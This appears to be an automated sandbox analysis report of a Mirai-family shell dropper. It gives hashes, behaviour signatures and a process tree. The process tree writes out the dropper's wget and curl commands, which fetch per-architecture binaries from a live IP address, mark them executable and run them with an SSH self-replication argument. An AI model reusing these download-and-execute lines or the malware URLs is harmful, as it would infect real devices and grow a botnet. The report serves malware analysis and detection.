Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
07/03/2025, 12:41
Static task
static1
Behavioral task
behavioral1
Sample
0x83911d24Fx.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0x83911d24Fx.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0x83911d24Fx.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0x83911d24Fx.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0x83911d24Fx.sh
-
Size
2KB
-
MD5
6aea9de4b1853e6a5cea8ad020f48398
-
SHA1
20e44372765f05e6899aa9bd7e4d9ff64f59c2f7
-
SHA256
e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f
-
SHA512
4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2
Malware Config
Extracted
mirai
DEMONS
Extracted
mirai
DEMONS
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 776 chmod 852 chmod 862 chmod 883 chmod 904 chmod 756 chmod 845 chmod 869 chmod 876 chmod 890 chmod 897 chmod 743 chmod 750 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/x 744 0x83911d24Fx.sh /tmp/x 751 0x83911d24Fx.sh /tmp/x 757 0x83911d24Fx.sh /tmp/x 777 0x83911d24Fx.sh /tmp/x 846 0x83911d24Fx.sh /tmp/x 853 0x83911d24Fx.sh /tmp/x 863 0x83911d24Fx.sh /tmp/x 870 0x83911d24Fx.sh /tmp/x 877 0x83911d24Fx.sh /tmp/x 884 0x83911d24Fx.sh /tmp/x 891 0x83911d24Fx.sh /tmp/x 898 0x83911d24Fx.sh /tmp/x 905 0x83911d24Fx.sh -
Modifies Watchdog functionality 1 TTPs 22 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/misc/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/watchdog x File opened for modification /dev/misc/watchdog x -
Enumerates active TCP sockets 1 TTPs 10 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
Writes file to system bin folder 11 IoCs
description ioc Process File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x File opened for modification /sbin/watchdog x -
Changes its process name 11 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself lGbPzDMcHGPGg^ 757 x Changes the process name, possibly in an attempt to hide itself Gz}gGG^~zScS[[ 777 x Changes the process name, possibly in an attempt to hide itself gg}lB^Gr]KDD`Dg 846 x Changes the process name, possibly in an attempt to hide itself ^`IPGiIpfl\`^ 853 x Changes the process name, possibly in an attempt to hide itself `DMHgPy*SMbDGIfg 863 x Changes the process name, possibly in an attempt to hide itself `Gb^*PkgD} 870 x Changes the process name, possibly in an attempt to hide itself lbH*y^c[gpr}c[G\ 877 x Changes the process name, possibly in an attempt to hide itself ^l~Kz]\BHz[ 884 x Changes the process name, possibly in an attempt to hide itself `kS`Xb\^SBg` 891 x Changes the process name, possibly in an attempt to hide itself gr`[lgP 898 x Changes the process name, possibly in an attempt to hide itself yfp^^k~\GMiP`f 905 x -
Reads system network configuration 1 TTPs 10 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x File opened for reading /proc/net/tcp x -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 746 wget 748 curl 749 cat -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/uYtea.x86_64 wget File opened for modification /tmp/uYtea.x86_64 curl File opened for modification /tmp/x 0x83911d24Fx.sh File opened for modification /tmp/uYtea.arm5 curl File opened for modification /tmp/uYtea.arm7 wget File opened for modification /tmp/uYtea.sh4 wget File opened for modification /tmp/uYtea.arc wget File opened for modification /tmp/uYtea.mips wget File opened for modification /tmp/uYtea.mips curl File opened for modification /tmp/uYtea.mpsl wget File opened for modification /tmp/uYtea.arm6 wget File opened for modification /tmp/uYtea.m68k curl File opened for modification /tmp/uYtea.spc wget File opened for modification /tmp/uYtea.arc curl File opened for modification /tmp/uYtea.x86 curl File opened for modification /tmp/uYtea.mpsl curl File opened for modification /tmp/uYtea.arm curl File opened for modification /tmp/uYtea.arm5 wget File opened for modification /tmp/uYtea.arm6 curl File opened for modification /tmp/uYtea.arm7 curl File opened for modification /tmp/uYtea.ppc curl File opened for modification /tmp/uYtea.spc curl File opened for modification /tmp/uYtea.x86 wget File opened for modification /tmp/uYtea.arm wget File opened for modification /tmp/uYtea.ppc wget File opened for modification /tmp/uYtea.m68k wget File opened for modification /tmp/uYtea.sh4 curl
Processes
-
/tmp/0x83911d24Fx.sh/tmp/0x83911d24Fx.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:717 -
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x862⤵
- Writes file to tmp directory
PID:721
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/catcat uYtea.x862⤵PID:742
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/x./x SSH.Selfrep2⤵PID:744
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/catcat uYtea.mips2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.mips uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/x./x SSH.Selfrep2⤵PID:751
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Writes file to tmp directory
PID:753
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat uYtea.mpsl2⤵PID:755
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:757
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:777
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Writes file to tmp directory
PID:830
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:846
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Writes file to tmp directory
PID:848
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh systemd-private-47ef9f21a13244f6a9028ae507250241-systemd-timedated.service-U1lFCl uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:853
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Writes file to tmp directory
PID:859
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:863
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Writes file to tmp directory
PID:865
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:870
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Writes file to tmp directory
PID:872
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:877
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Writes file to tmp directory
PID:879
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:884
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Writes file to tmp directory
PID:886
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:891
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Writes file to tmp directory
PID:893
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:898
-
-
/usr/bin/wgetwget http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Writes file to tmp directory
PID:900
-
-
/usr/bin/curlcurl -O http://176.100.37.236/LjEZs/uYtea.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/chmodchmod +x 0x83911d24Fx.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/x./x SSH.Selfrep2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:905
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD5e8ee0839bb7869765d80e4280d585222
SHA1e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538
SHA25634537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6
SHA512a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b
-
Filesize
75KB
MD5e22278172a0f989dcd639152d1f7bdda
SHA15ef82abd4a65994779ed81263e4495aa2a1fc0a0
SHA256c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3
SHA512686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e
-
Filesize
75KB
MD5d40b08390f13aa89c14e0fedff56e41f
SHA17f5f215fef320e6677f9490dff7732d46f157af9
SHA25610a4c1b8a7106008acb65a31ab3d078f7b056eb30e4397f8b7a09b39855d23ea
SHA512e385eb0f4a06f0264bc5f0b95ffb83673834e3ffb267f947c264f2ccb5017bdee416b6e7c158ed1ef066d14f26eddc7426ab0313fc4de4948fbefb51637be7a6